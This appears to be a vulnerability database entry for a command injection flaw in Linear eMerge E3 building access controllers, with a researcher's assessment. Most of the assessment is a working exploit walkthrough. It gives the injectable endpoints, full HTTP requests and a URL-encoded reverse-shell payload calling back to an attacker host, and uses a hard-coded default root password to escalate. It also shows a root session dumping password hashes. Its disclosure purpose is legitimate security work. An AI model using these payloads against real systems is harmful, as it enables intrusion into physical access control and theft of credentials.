10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%
Linear eMerge E3-Series devices allow Command Injections.
Recent assessments:
h00die-gr3y at December 03, 2022 12:46pm UTC reported:
Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital. Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems in an entire building – potentially causing physical damage, introducing safety risks or financial repercussions.
In one of the recent security engagements, we stumbled across a Nortek Linear eMerge E3 Access Controller managing all the building and camera access. It was exposed to the Internet for remote management on port 80 and we soon figured out that it was vulnerable.
And guess what, these vulnerabilities were already discovered in 2019 by Gjoko Krstic
a.k.a LiquidWorm
from Applied Risk. He published a paper AR2019005 that demonstrated a raft of critical vulnerabilities that exists on these Building Access Control Systems.
Nortek Security & Control, LLC (NSC)
, the manufacturer of these Access Controls Systems is a leader in wireless security, home automation and personal safety systems and devices.
They claim that the eMerge E3-Series embedded browser-based network appliance platform makes advanced security
technology reliable
and affordable for any entry-level access control application.
Well, forget the words advanced security
and reliable
because it is pretty tragic to see that the majority of these Linear eMerge E3 access controllers (around 3500 listed in Shodan
) are still vulnerable in 2022 and impose a huge security risk on the organizations using these devices for their physical and logical security.
Recently Nice
, a global manufacturer of smart home, security and building automation solutions, announced the acquisition of Nortek and let’s hope that this will improve the quality of their security products.
Now let’s demonstrate on how vulnerable this platform is and bare in mind that this platform is responsible for building and camera access and therefore a prime target for malicious actors.
Within the Linear eMerge E3 access controller, several endpoints are vulnerable to a remote command injection (RCE).
http://HOST:PORT/card_scan_decoder.php?No=30&door=%60<CMD>
%60
http://HOST:PORT/card_scan.php?No=30&ReaderNo=%60<CMD>
%60
http://HOST:PORT/card_scan.php?No=1337&ReaderNo=%60<CMD>
%60&CardFormatNo=1337
You can easily demonstrate this with burpsuite
crafting a request, using the sleep
command or create a test file with the command whoami > cuckoo.txt
which then can be access through the web interface.
Burp request
GET /card_scan_decoder.php?No=30&door=%60sleep+10%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Response which will take around 10 seconds…
HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.23
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 03 Dec 2022 04:53:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=utf-8
Connection: close
Date: Sat, 03 Dec 2022 04:53:32 GMT
Server: lighttpd/1.4.22
Content-Length: 67
{"raw":false,"card_format_default":"","total_bit":null,"data":null}
Example with whoami
command
Burp request
GET /card_scan_decoder.php?No=30&door=%60whoami+>cuckoo.txt%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Get cuckoo.txt
GET /cuckoo.txt HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2943015055"
Last-Modified: Sat, 03 Dec 2022 05:02:15 GMT
Content-Length: 9
Connection: close
Date: Sat, 03 Dec 2022 05:07:06 GMT
Server: lighttpd/1.4.22
lighttpd
This is already pretty interesting for malicious actors to pursue, but there is more to it.
The lighttpd
user is restricted to execute certain commands due a restricted busybox
implementation, so it is difficult to get a real reverse shell or meterpreter session established which gives full control on the server.
Well, do not worry, our Nortek friends also decided to implement a default root password on the access controller which easily can be picked from etc/password
.
Yes, you red it right, /etc/password
with read rights for the world instead of using /etc/shadow
(see my analysis on CVE-2019-7252 for more info).
This password has already been hacked in 2019 and can be used to escalate privileges and get a root shell or meterpreter session.
Let’s show a quick example how we spawn a root shell…
First generate a payload with msfvenom
# msfvenom -p cmd/unix/reverse_bash LHOST=<ATTACKER> LPORT=<PORT> -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
bash -c '0<&74-;exec 74<>/dev/tcp/<ATTACKER>/<PORT>;sh <&74 >&74 2>&74'
Next step is to create the payload using the default root password davestyle
payload: echo davestyle | su -c "bash -c '0<&74-;exec 74<>/dev/tcp/<ATTACKER>/<PORT>;sh <&74 >&74 2>&74'"
Apply URL encoding to make it work in your burp request and start a multi/handler
with the reverse_bash payload , <ATTACKER>
and <PORT>
settings in msf
.
URL encode payload: %60echo+davestyle+%7C+su+-c+%22bash+-c+%270%3C%2674-%3Bexec+74%3C%3E%2Fdev%2Ftcp%2F<ATTACKER>%2F<PORT>%3Bsh+%3C%2674+%3E%2674+2%3E%2674%27%22%60
Burp request
GET /card_scan_decoder.php?No=30&door=%60echo+davestyle+%7C+su+-c+%22bash+-c+%270%3C%2674-%3Bexec+74%3C%3E%2Fdev%2Ftcp%2F<ATTACKER>%2F<PORT>%3Bsh+%3C%2674+%3E%2674+2%3E%2674%27%22%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Metasploit handler
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on <ATTACKER>:<PORT>
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (127.0.0.1:<PORT> -> 127.0.0.1:48944) at 2022-12-03 11:42:27 +0000
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
whoami
root
ls -l /etc/passwd
-rwxr--r-- 1 e3user linear 733 Nov 13 2012 /etc/passwd
cat /etc/passwd
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
The example above show that it is pretty simple to weaponize and therefore there is a high probability of exploitation in the wild.
I have created a Metasploit module that has been submitted to the Metasploit mainstream.
Please update your Linear eMerge E3 access controller to a higher version then 1.00-06
.
Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities
Packet storm
Metasploit module
Credits goes to the security researcher below who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
packetstormsecurity.com/files/155255/Linear-eMerge-E3-1.00-06-card_scan.php-Command-Injection.html
packetstormsecurity.com/files/155256/Linear-eMerge-E3-1.00-06-card_scan_decoder.php-Command-Injection.html
packetstormsecurity.com/files/155272/Linear-eMerge-E3-Access-Controller-Command-Injection.html
packetstormsecurity.com/files/170372/Linear-eMerge-E3-Series-Access-Controller-Command-Injection.html
applied-risk.com/labs/advisories
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7256
www.applied-risk.com/resources/ar-2019-005
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.974 High
EPSS
Percentile
99.9%